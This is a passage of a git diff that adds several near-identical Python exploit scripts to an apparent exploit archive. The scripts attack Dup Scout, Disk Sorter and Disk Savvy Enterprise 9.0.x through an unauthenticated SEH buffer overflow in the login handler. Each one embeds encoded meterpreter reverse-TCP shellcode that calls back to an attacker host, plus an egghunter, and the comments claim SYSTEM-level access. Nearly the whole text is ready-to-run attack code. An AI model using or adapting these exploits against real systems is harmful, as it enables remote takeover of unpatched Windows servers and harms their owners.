"\xda\xd9\xba\x43\x1b\x3f\x40\xd9\x74\x24\xf4\x58\x2b" +buf += "\xc9\xb1\x47\x31\x50\x18\x03\x50\x18\x83\xc0\x47\xf9" +buf += "\xca\xbc\xaf\x7f\x34\x3d\x2f\xe0\xbc\xd8\x1e\x20\xda" +buf += "\xa9\x30\x90\xa8\xfc\xbc\x5b\xfc\x14\x37\x29\x29\x1a" +buf += "\xf0\x84\x0f\x15\x01\xb4\x6c\x34\x81\xc7\xa0\x96\xb8" +buf += "\x07\xb5\xd7\xfd\x7a\x34\x85\x56\xf0\xeb\x3a\xd3\x4c" +buf += "\x30\xb0\xaf\x41\x30\x25\x67\x63\x11\xf8\xfc\x3a\xb1" +buf += "\xfa\xd1\x36\xf8\xe4\x36\x72\xb2\x9f\x8c\x08\x45\x76" +buf += "\xdd\xf1\xea\xb7\xd2\x03\xf2\xf0\xd4\xfb\x81\x08\x27" +buf += "\x81\x91\xce\x5a\x5d\x17\xd5\xfc\x16\x8f\x31\xfd\xfb" +buf += "\x56\xb1\xf1\xb0\x1d\x9d\x15\x46\xf1\x95\x21\xc3\xf4" +buf += "\x79\xa0\x97\xd2\x5d\xe9\x4c\x7a\xc7\x57\x22\x83\x17" +buf += "\x38\x9b\x21\x53\xd4\xc8\x5b\x3e\xb0\x3d\x56\xc1\x40" +buf += "\x2a\xe1\xb2\x72\xf5\x59\x5d\x3e\x7e\x44\x9a\x41\x55" +buf += "\x30\x34\xbc\x56\x41\x1c\x7a\x02\x11\x36\xab\x2b\xfa" +buf += "\xc6\x54\xfe\x97\xc3\xc2\xc1\xc0\xb7\x92\xaa\x12\x48" +buf += "\x83\x76\x9a\xae\xf3\xd6\xcc\x7e\xb3\x86\xac\x2e\x5b" +buf += "\xcd\x22\x10\x7b\xee\xe8\x39\x11\x01\x45\x11\x8d\xb8" +buf += "\xcc\xe9\x2c\x44\xdb\x97\x6e\xce\xe8\x68\x20\x27\x84" +buf += "\x7a\xd4\xc7\xd3\x21\x72\xd7\xc9\x4c\x7a\x4d\xf6\xc6" +buf += "\x2d\xf9\xf4\x3f\x19\xa6\x07\x6a\x12\x6f\x92\xd5\x4c" +buf += "\x90\x72\xd6\x8c\xc6\x18\xd6\xe4\xbe\x78\x85\x11\xc1" +buf += "\x54\xb9\x8a\x54\x57\xe8\x7f\xfe\x3f\x16\xa6\xc8\x9f" +buf += "\xe9\x8d\xc8\xdc\x3f\xeb\xbe\x0c\xfc" + +#pop pop ret 10030991 + +nseh = "\x90\x90\xEB\x0B" +seh = "\x91\x09\x03\x10" + +egghunter = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74" +egghunter += "\xef\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7" + + +evil = "POST /login HTTP/1.1\r\n" +evil += "Host: 192.168.123.132\r\n" +evil += "User-Agent: Mozilla/5.0\r\n" +evil += "Connection: close\r\n" +evil += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n" +evil += "Accept-Language: en-us,en;q=0.5\r\n" +evil += "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n" +evil += "Keep-Alive: 300\r\n" +evil += "Proxy-Connection: keep-alive\r\n" +evil += "Content-Type: application/x-www-form-urlencoded\r\n" +evil += "Content-Length: 17000\r\n\r\n" +evil += "username=admin" +evil += "&password=aaaaa\r\n" +evil += "\x41" * 12292 #subtract/add for payload +evil += "w00tw00t" +evil += "\x90" * 20 +evil += buf +evil += "\x90" * 50 +evil += "\x42" * 1614 +evil += nseh +evil += seh +evil += "\x90" * 20 +evil += egghunter +evil += "\x90" * 7000 + +print 'Sending evil buffer...' +s.send(evil) +print 'Payload Sent!' +s.close() + + diff --git a/platforms/windows/remote/40457.py b/platforms/windows/remote/40457.py new file mode 100755 index 000000000..6c25eb807 --- /dev/null +++ b/platforms/windows/remote/40457.py @@ -0,0 +1,93 @@ +#!/usr/bin/python + +print "Dup Scout Enterprise 9.0.28 Buffer Overflow Exploit" +print "Author: Tulpa / tulpa[at]tulpa-security[dot]com" + +#Author website: www.tulpa-security.com +#Author twitter: @tulpa_security + +#Exploit will land you NT AUTHORITY\SYSTEM +#You do not need to be authenticated, password below is garbage +#Swop out IP, shellcode and remember to adjust '\x41' for bytes +#Tested on Windows 7 x86 Enterprise SP1 + +#Shout-out to carbonated and ozzie_offsec + +import socket +import sys + +s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) +connect=s.connect(('192.168.123.132',80)) + +#bad chars \x00\x0a\x0d\x26 + +#msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=192.168.123.128 LPORT=4444 -e x86/shikata_ga_nai -b '\x00\x0a\x0d\x26' -f python --smallest + +#payload size 308 + +buf = "" +buf += "\xda\xd9\xba\x43\x1b\x3f\x40\xd9\x74\x24\xf4\x58\x2b" +buf += "\xc9\xb1\x47\x31\x50\x18\x03\x50\x18\x83\xc0\x47\xf9" +buf += "\xca\xbc\xaf\x7f\x34\x3d\x2f\xe0\xbc\xd8\x1e\x20\xda" +buf += "\xa9\x30\x90\xa8\xfc\xbc\x5b\xfc\x14\x37\x29\x29\x1a" +buf += "\xf0\x84\x0f\x15\x01\xb4\x6c\x34\x81\xc7\xa0\x96\xb8" +buf += "\x07\xb5\xd7\xfd\x7a\x34\x85\x56\xf0\xeb\x3a\xd3\x4c" +buf += "\x30\xb0\xaf\x41\x30\x25\x67\x63\x11\xf8\xfc\x3a\xb1" +buf += "\xfa\xd1\x36\xf8\xe4\x36\x72\xb2\x9f\x8c\x08\x45\x76" +buf += "\xdd\xf1\xea\xb7\xd2\x03\xf2\xf0\xd4\xfb\x81\x08\x27" +buf += "\x81\x91\xce\x5a\x5d\x17\xd5\xfc\x16\x8f\x31\xfd\xfb" +buf += "\x56\xb1\xf1\xb0\x1d\x9d\x15\x46\xf1\x95\x21\xc3\xf4" +buf += "\x79\xa0\x97\xd2\x5d\xe9\x4c\x7a\xc7\x57\x22\x83\x17" +buf += "\x38\x9b\x21\x53\xd4\xc8\x5b\x3e\xb0\x3d\x56\xc1\x40" +buf += "\x2a\xe1\xb2\x72\xf5\x59\x5d\x3e\x7e\x44\x9a\x41\x55" +buf += "\x30\x34\xbc\x56\x41\x1c\x7a\x02\x11\x36\xab\x2b\xfa" +buf += "\xc6\x54\xfe\x97\xc3\xc2\xc1\xc0\xb7\x92\xaa\x12\x48" +buf += "\x83\x76\x9a\xae\xf3\xd6\xcc\x7e\xb3\x86\xac\x2e\x5b" +buf += "\xcd\x22\x10\x7b\xee\xe8\x39\x11\x01\x45\x11\x8d\xb8" +buf += "\xcc\xe9\x2c\x44\xdb\x97\x6e\xce\xe8\x68\x20\x27\x84" +buf += "\x7a\xd4\xc7\xd3\x21\x72\xd7\xc9\x4c\x7a\x4d\xf6\xc6" +buf += "\x2d\xf9\xf4\x3f\x19\xa6\x07\x6a\x12\x6f\x92\xd5\x4c" +buf += "\x90\x72\xd6\x8c\xc6\x18\xd6\xe4\xbe\x78\x85\x11\xc1" +buf += "\x54\xb9\x8a\x54\x57\xe8\x7f\xfe\x3f\x16\xa6\xc8\x9f" +buf += "\xe9\x8d\xc8\xdc\x3f\xeb\xbe\x0c\xfc" + +#pop pop ret 1006cd33 + +nseh = "\x90\x90\xEB\x0B" +seh = "\x33\xcd\x06\x10" + +egghunter = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74" +egghunter += "\xef\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7" + + +evil = "POST /login HTTP/1.1\r\n" +evil += "Host: 192.168.123.132\r\n" +evil += "User-Agent: Mozilla/5.0\r\n" +evil += "Connection: close\r\n" +evil += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n" +evil += "Accept-Language: en-us,en;q=0.5\r\n" +evil += "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n" +evil += "Keep-Alive: 300\r\n" +evil += "Proxy-Connection: keep-alive\r\n" +evil += "Content-Type: application/x-www-form-urlencoded\r\n" +evil += "Content-Length: 17000\r\n\r\n" +evil += "username=admin" +evil += "&password=aaaaa\r\n" +evil += "\x41" * 12292 #subtract/add for payload +evil += "w00tw00t" +evil += "\x90" * 20 +evil += buf +evil += "\x90" * 50 +evil += "\x42" * 1614 +evil += nseh +evil += seh +evil += "\x90" * 20 +evil += egghunter +evil += "\x90" * 7000 + +print 'Sending evil buffer...' +s.send(evil) +print 'Payload Sent!' +s.close() + + diff --git a/platforms/windows/remote/40458.py b/platforms/windows/remote/40458.py new file mode 100755 index 000000000..8235ece09 --- /dev/null +++ b/platforms/windows/remote/40458.py @@ -0,0 +1,93 @@ +#!/usr/bin/python + +print "Disk Sorter Enterprise 9.0.24 Buffer Overflow Exploit" +print "Author: Tulpa / tulpa[at]tulpa-security[dot]com" + +#Author website: www.tulpa-security.com +#Author twitter: @tulpa_security + +#Exploit will land you NT AUTHORITY\SYSTEM +#You do not need to be authenticated, password below is garbage +#Swop out IP, shellcode and remember to adjust '\x41' for bytes +#Tested on Windows 7 x86 Enterprise SP1 + +#Shout-out to ozzie_offsec and carbonated + +import socket +import sys + +s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) +connect=s.connect(('192.168.123.132',80)) + +#bad chars \x00\x0a\x0d\x26 + +#msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=192.168.123.128 LPORT=4444 -e x86/shikata_ga_nai -b '\x00\x0a\x0d\x26' -f python --smallest + +#payload size 308 + +buf = "" +buf += "\xda\xd9\xba\x43\x1b\x3f\x40\xd9\x74\x24\xf4\x58\x2b" +buf += "\xc9\xb1\x47\x31\x50\x18\x03\x50\x18\x83\xc0\x47\xf9" +buf += "\xca\xbc\xaf\x7f\x34\x3d\x2f\xe0\xbc\xd8\x1e\x20\xda" +buf += "\xa9\x30\x90\xa8\xfc\xbc\x5b\xfc\x14\x37\x29\x29\x1a" +buf += "\xf0\x84\x0f\x15\x01\xb4\x6c\x34\x81\xc7\xa0\x96\xb8" +buf += "\x07\xb5\xd7\xfd\x7a\x34\x85\x56\xf0\xeb\x3a\xd3\x4c" +buf += "\x30\xb0\xaf\x41\x30\x25\x67\x63\x11\xf8\xfc\x3a\xb1" +buf += "\xfa\xd1\x36\xf8\xe4\x36\x72\xb2\x9f\x8c\x08\x45\x76" +buf += "\xdd\xf1\xea\xb7\xd2\x03\xf2\xf0\xd4\xfb\x81\x08\x27" +buf += "\x81\x91\xce\x5a\x5d\x17\xd5\xfc\x16\x8f\x31\xfd\xfb" +buf += "\x56\xb1\xf1\xb0\x1d\x9d\x15\x46\xf1\x95\x21\xc3\xf4" +buf += "\x79\xa0\x97\xd2\x5d\xe9\x4c\x7a\xc7\x57\x22\x83\x17" +buf += "\x38\x9b\x21\x53\xd4\xc8\x5b\x3e\xb0\x3d\x56\xc1\x40" +buf += "\x2a\xe1\xb2\x72\xf5\x59\x5d\x3e\x7e\x44\x9a\x41\x55" +buf += "\x30\x34\xbc\x56\x41\x1c\x7a\x02\x11\x36\xab\x2b\xfa" +buf += "\xc6\x54\xfe\x97\xc3\xc2\xc1\xc0\xb7\x92\xaa\x12\x48" +buf += "\x83\x76\x9a\xae\xf3\xd6\xcc\x7e\xb3\x86\xac\x2e\x5b" +buf += "\xcd\x22\x10\x7b\xee\xe8\x39\x11\x01\x45\x11\x8d\xb8" +buf += "\xcc\xe9\x2c\x44\xdb\x97\x6e\xce\xe8\x68\x20\x27\x84" +buf += "\x7a\xd4\xc7\xd3\x21\x72\xd7\xc9\x4c\x7a\x4d\xf6\xc6" +buf += "\x2d\xf9\xf4\x3f\x19\xa6\x07\x6a\x12\x6f\x92\xd5\x4c" +buf += "\x90\x72\xd6\x8c\xc6\x18\xd6\xe4\xbe\x78\x85\x11\xc1" +buf += "\x54\xb9\x8a\x54\x57\xe8\x7f\xfe\x3f\x16\xa6\xc8\x9f" +buf += "\xe9\x8d\xc8\xdc\x3f\xeb\xbe\x0c\xfc" + +#pop pop ret 10048d36 + +nseh = "\x90\x90\xEB\x0B" +seh = "\x36\x8d\x04\x10" + +egghunter = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74" +egghunter += "\xef\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7" + + +evil = "POST /login HTTP/1.1\r\n" +evil += "Host: 192.168.123.132\r\n" +evil += "User-Agent: Mozilla/5.0\r\n" +evil += "Connection: close\r\n" +evil += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n" +evil += "Accept-Language: en-us,en;q=0.5\r\n" +evil += "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n" +evil += "Keep-Alive: 300\r\n" +evil += "Proxy-Connection: keep-alive\r\n" +evil += "Content-Type: application/x-www-form-urlencoded\r\n" +evil += "Content-Length: 17000\r\n\r\n" +evil += "username=admin" +evil += "&password=aaaaa\r\n" +evil += "\x41" * 12292 #subtract/add for payload +evil += "w00tw00t" +evil += "\x90" * 20 +evil += buf +evil += "\x90" * 50 +evil += "\x42" * 1614 +evil += nseh +evil += seh +evil += "\x90" * 20 +evil += egghunter +evil += "\x90" * 7000 + +print 'Sending evil buffer...' +s.send(evil) +print 'Payload Sent!' +s.close() + + diff --git a/platforms/windows/remote/40459.py b/platforms/windows/remote/40459.py new file mode 100755 index 000000000..8a4b67c06 --- /dev/null +++ b/platforms/windows/remote/40459.py @@ -0,0 +1,93 @@ +#!/usr/bin/python + +print "Disk Savvy Enterprise 9.0.32 Buffer Overflow Exploit" +print "Author: Tulpa / tulpa[at]tulpa-security[dot]com" + +#Author website: www.tulpa-security.com +#Author twitter: @tulpa_security + +#Exploit will land you NT AUTHORITY\SYSTEM +#You do not need to be authenticated, password below is garbage +#Swop out IP, shellcode and remember to adjust '\x41' for bytes +#Tested on Windows 7 x86 Enterprise SP1 + +#Shout-out to carbonated and ozzie_offsec + +import socket +import sys + +s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) +connect=s.connect(('192.168.123.132',80)) + +#bad chars \x00\x0a\x0d\x26 + +#msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=192.168.123.128 LPORT=4444 -e x86/shikata_ga_nai -b '\x00\x0a\x0d\x26' -f python --smallest + +#payload size 308 + +buf = "" +buf += "\xda\xd9\xba\x43\x1b\x3f\x40\xd9\x74\x24\xf4\x58\x2b" +buf += "\xc9\xb1\x47\x31\x50\x18\x03\x50\x18\x83\xc0\x47\xf9" +buf += "\xca\xbc\xaf\x7f\x34\x3d\x2f\xe0\xbc\xd8\x1e\x20\xda" +buf += "\xa9\x30\x90\xa8\xfc\xbc\x5b\xfc\x14\x37\x29\x29\x1a" +buf += "\xf0\x84\x0f\x15\x01\xb4\x6c\x34\x81\xc7\xa0\x96\xb8" +buf += "\x07\xb5\xd7\xfd\x7a\x34\x85\x56\xf0\xeb\x3a\xd3\x4c" +buf += "\x30\xb0\xaf\x41\x30\x25\x67\x63\x11\xf8\xfc\x3a\xb1" +buf += "\xfa\xd1\x36\xf8\xe4\x36\x72\xb2\x9f\x8c\x08\x45\x76" +buf += "\xdd\xf1\xea\xb7\xd2\x03\xf2\xf0\xd4\xfb\x81\x08\x27" +buf += "\x81\x91\xce\x5a\x5d\x17\xd5\xfc\x16\x8f\x31\xfd\xfb" +buf += "\x56\xb1\xf1\xb0\x1d\x9d\x15\x46\xf1\x95\x21\xc3\xf4" +buf += "\x79\xa0\x97\xd2\x5d\xe9\x4c\x7a\xc7\x57\x22\x83\x17" +buf += "\x38\x9b\x21\x53\xd4\xc8\x5b\x3e\xb0\x3d\x56\xc1\x40" +buf += "\x2a\xe1\xb2\x72\xf5\x59\x5d\x3e\x7e\x44\x9a\x41\x55" +buf += "\x30\x34\xbc\x56\x41\x1c\x7a\x02\x11\x36\xab\x2b\xfa" +buf += "\xc6\x54\xfe\x97\xc3\xc2\xc1\xc0\xb7\x92\xaa\x12\x48" +buf += "\x83\x76\x9a\xae\xf3\xd6\xcc\x7e\xb3\x86\xac\x2e\x5b" +buf += "\xcd\x22\x10\x7b\xee\xe8\x39\x11\x01\x45\x11\x8d\xb8" +buf += "\xcc\xe9\x2c\x44\xdb\x97\x6e\xce\xe8\x68\x20\x27\x84" +buf += "\x7a\xd4\xc7\xd3\x21\x72\xd7\xc9\x4c\x7a\x4d\xf6\xc6" +buf += "\x2d\xf9\xf4\x3f\x19\xa6\x07\x6a\x12\x6f\x92\xd5\x4c" +buf += "\x90\x72\xd6\x8c\xc6\x18\xd6\xe4\xbe\x78\x85\x11\xc1" +buf += "\x54\xb9\x8a\x54\x57\xe8\x7f\xfe\x3f\x16\xa6\xc8\x9f" +buf += "\xe9\x8d\xc8\xdc\x3f\xeb\xbe\x0c\xfc" + +#pop pop ret 10076451 + +nseh = "\x90\x90\xEB\x0B" +seh = "\x51\x64\x07\x10" + +egghunter = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74" +egghunter += "\xef\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7" + + +evil = "POST /login HTTP/1.1\r\n" +evil += "Host: 192.168.123.132\r\n" +evil += "User-Agent: Mozilla/5.0\r\n" +evil += "Connection: close\r\n" +evil += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n" +evil += "Accept-Language: en-us,en;q=0.5\r\n" +evil += "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n" +evil += "Keep-Alive: 300\r\n" +evil += "Proxy-Connection: keep-alive\r\n" +evil += "Content-Type: application/x-www-form-urlencoded\r\n" +evil += "Content-Length: 17000\r\n\r\n" +evil += "username=admin" +evil += "&password=aaaaa\r\n" +evil += "\x41" * 12292 #subtract/add for payload +evil += "w00tw00t" +evil += "\x90" * 20 +evil += buf +evil += "\x90" * 50 +evil += "\x42" * 1614 +evil += nseh +evil += seh +evil += "\x90" * 20 +evil += egghunter +evil += "\x90" * 7000 + +print 'Sending evil buffer...' +s.send(evil) +print 'Payload Sent!' +s.close() + +